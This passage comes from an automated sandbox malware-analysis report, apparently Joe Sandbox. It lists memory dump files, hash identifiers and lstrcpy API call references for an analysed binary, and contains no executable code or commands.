                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: b35e00cf45c11c1cada087ae8bd8c3b16775f4be8373c1b89f1d76197e79d954
                          • Instruction ID: b34e4ade227b945aff803356feb8a85a26b27ba9e3544d9fbb0923c48406439c
                          • Opcode Fuzzy Hash: b35e00cf45c11c1cada087ae8bd8c3b16775f4be8373c1b89f1d76197e79d954
                          • Instruction Fuzzy Hash: F731D474A01F029FE724DF3AC588996BBE5BF89700700492EA996C3B10DB34F891CF84
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 0051162D
                          • lstrcpy.KERNEL32(00000000,?), ref: 0051164F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511671
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511693
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 9e5b0573bb3e78a29013a51e8078973ab825c32374f3fbed85c2ce1bb065785d
                          • Instruction ID: 11685318ce443b57c7d396ff52c2968d7a7389443031c11401db8eb8d1d0f25c
                          • Opcode Fuzzy Hash: 9e5b0573bb3e78a29013a51e8078973ab825c32374f3fbed85c2ce1bb065785d
                          • Instruction Fuzzy Hash: 36115E74A11B039BEB249F79D40C967BBF8BF45701708452DE586C3B40EB34E891CB98